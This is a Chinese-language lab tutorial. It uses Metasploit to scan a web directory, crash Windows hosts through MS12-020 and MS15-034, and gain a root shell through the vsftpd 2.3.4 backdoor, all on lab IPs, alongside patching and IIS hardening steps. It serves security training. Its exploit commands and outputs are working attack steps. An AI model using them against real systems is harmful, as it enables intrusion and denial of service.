MSF辅助模块Auxiliary
1、网站目录扫描(Linux靶机)
第一步:查找辅助脚本,使用辅助脚本
msf6 > search dir_scan//搜索dir_scan脚本
msf6 > use 0 //使用编号为0的脚本
msf6 > set rhosts 192.168.10.143 //设置攻击目标
msf6 > run //运行脚本
[] Detecting error code
[] Using code '404' as not found for 192.168.10.143
[+] Found http://192.168.10.143:80/cgi-bin/ 404 (192.168.10.143)
[+] Found http://192.168.10.143:80/doc/ 200 (192.168.10.143)
[+] Found http://192.168.10.143:80/icons/ 404 (192.168.10.143)
[+] Found http://192.168.10.143:80/index/ 404 (192.168.10.143)
[+] Found http://192.168.10.143:80/phpMyAdmin/ 200 (192.168.10.143)
[+] Found http://192.168.10.143:80/test/ 404 (192.168.10.143)第二步:验证网站目录
在物理机浏览器访问: http://192.168.10.143/doc/
2、DOS攻击(Windows靶机)
1)MS12-020 远程桌面漏洞-死亡之蓝
CVE-2012-0002(MS12-020)漏洞,利用Windows系统的远程桌面协议(RDP)存在缓存溢出漏洞,攻击者可通过向目标操作系统发送特定内容的RDP包造成操作系统蓝屏
msf6 > search ms12-020 //搜索ms12-020脚本
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/rdp/ms12_020_check normal Yes MS12-020 Microsoft Remote Desktop Checker
1 auxiliary/dos/windows/rdp/ms12_020_maxchannelids 2012-03-16 normal No MS12-020 Microsoft Remote Desktop Use-After-Free DoS一个是ID为0 有一个关键词scanner ,发扫描的脚本
一个是ID为1 有一个关键词dos ,是拒绝服务攻击的脚本msf6 > use 1 //使用DOS攻击脚本
msf6 auxiliary(scanner/rdp/ms12_020_check) > set rhosts 192.168.10.129 //设置攻击目标
msf6 auxiliary(scanner/rdp/ms12_020_check) > run //攻击2)防御MS12-020漏洞
安装补丁Windows6.1-KB2621440-x64.msu
MSF辅助模块Exploit
CVE-2011-2523 vsftpd 2.3.4 后门漏洞(笑脸漏洞),此漏洞允许以root身份执行任意命令
msf6 > search vsftpd
msf6 > use 0
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 192.168.10.143
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] 192.168.10.143:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.10.143:21 - USER: 331 Please specify the password.
[+] 192.168.10.143:21 - Backdoor service has been spawned, handling...
[+] 192.168.10.143:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.Command shell session 1 opened (0.0.0.0:0 -> 192.168.10.143:6200) //侵入成功
whoami //显示当前用户
root
pwd //查看当前目录
/root
CVE-2015-1635漏洞攻防实战
CVE-2015-1635(MS15-034)漏洞存在于HTTP协议堆栈(HTTP.sys)中,攻击者只要发送恶意http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃
补丁文件:Windows6.1-KB3042553-x64
1)漏洞扫描(OpenVAS报告)
2)用poc脚本去验证漏洞真实存在
1)上传 cve-2015-1635.poc 到kali 系统
C:\Users\Administrator>scp -r C:\\Users\Administrator\OneDrive\桌面\cve-2015-1635.poc kali@192.168.10.224:/tmp/
kali@192.168.10.224's password:
cve-2015-1635.poc 100% 912 114.2KB/s 00:002)修改cve-2015-1635.poc 文件中的 ipaddr 为 win2k8 地址
**ipAddr = "192.168.10.142"**
3)开始验证
[root@kali ~] # python2 cve-2015-1635.poc //执行POC验证脚本
[*] Audit Started //审计开始
[!!] Looks VULN //看起来很脆弱(vulnerable)
3)MSF漏洞利用,DOS攻击服务器蓝屏
msf6 > search ms15-034
msf6 > use 0
msf6 auxiliary(dos/http/ms15_034_ulonglongadd) > set rhosts 192.168.10.129
msf6 auxiliary(dos/http/ms15_034_ulonglongadd) > run
//检查W2K8 主机是否蓝屏
4)对IIS安全加固:关闭内核缓存
- 打开IIS管理器。
- 在连接树中,找到并选择你想要配置的网站。
- 在特性视图中,双击“输出缓存”。
- 在“操作”面板中,点击“编辑特性”。
- 取消选中“启用内核缓存”选项。
- 点击“应用”保存更改。
5)MSF漏洞利用,服务器不再蓝屏,成功防御了攻击
6)把内核缓存在开启(内核缓存可加快网站性能)
7)对系统进行加固:安装系统补丁
8)用POC脚本测试,发现提示目标服务器补丁已修复
9)MSF漏洞利用,发现目标服务器不在蓝屏
RDP的工作原理
RDP基于客户端/服务器模型工作。在这种模型中,远程桌面客户端连接到运行RDP服务器软件的远程计算机。数据交换经过加密,确保了传输过程中的安全性和隐私保护。
- 客户端:任何请求连接的设备,需要安装RDP客户端软件。Windows系统自带远程桌面连接客户端,而其他操作系统(如macOS、Linux、iOS和Android)可以使用第三方客户端。
- 服务器:被远程访问的计算机,需要配置并运行RDP服务器端。在Windows操作系统中,这通常意味着启用"远程桌面"功能。
主要特性
- 图形界面传输:RDP提供了高效的图形界面数据压缩和传输机制,确保远程会话流畅。
- 设备重定向:允许远程会话使用本地打印机、剪贴板、硬盘驱动器等资源。
- 端口和安全性:默认情况下,RDP使用TCP端口3389。所有RDP会话数据都可以加密,减少安全风险。
- 会话隔离:每个远程桌面会话都在其独立的虚拟会话中运行,不会影响其他用户的会话。
安全性和最佳实践
虽然RDP提供了便利的远程访问能力,但它也可能成为攻击者的目标。遵循一些最佳实践可以增强RDP会话的安全性:
- 使用强密码:确保所有用户账户都使用强密码。
- 更改默认端口:更改RDP的默认监听端口(3389),减少自动扫描的风险。
- 限制访问:通过防火墙规则限制可以访问RDP服务的IP地址。
- 启用网络级别认证(NLA):NLA为RDP会话提供了一个额外的认证层次,在会话建立之前进行。
- 使用VPN:通过VPN连接访问RDP服务,增加一层网络安全保护。
- 定期打补丁和更新:确保操作系统和RDP软件定期更新,以保护免受已知漏洞的攻击。
vsftpd
vsftpd
(Very Secure FTP Daemon,非常安全的FTP守护进程)是一款以安全为设计重点的FTP服务器软件,主要运行在Unix和类Unix操作系统上。它因其高性能、稳定性和尤其是对安全性的重视而广受好评。这里有一些关键点,让你对vsftpd有一个全面的了解:主要特性
- 安全性:
vsftpd
提供了强大的安全特性,包括对SSL/TLS的支持,这使得通过vsftpd传输的数据可以进行加密,有效防止数据在传输过程中被截取或窃听。- 性能:即使在处理大量并发连接的情况下,
vsftpd
也能保持良好的性能,这使其成为高流量网站和服务的理想选择。- 简易配置:尽管
vsftpd
提供了丰富的配置选项,以满足不同用户的需求,但其默认配置已经足够安全,对新手友好,同时也为经验丰富的管理员提供了灵活的配置可能。- 广泛的应用:
vsftpd
支持标准FTP协议,这意味着它可以与各种FTP客户端软件兼容,无论是命令行工具还是图形界面应用。安装和配置
vsftpd
可以通过大多数Unix和Linux发行版的包管理系统轻松安装。安装完成后,主要的配置工作是通过编辑其配置文件/etc/vsftpd/vsftpd.conf
来进行,其中可以设置匿名访问、用户权限、加密选项等多种参数。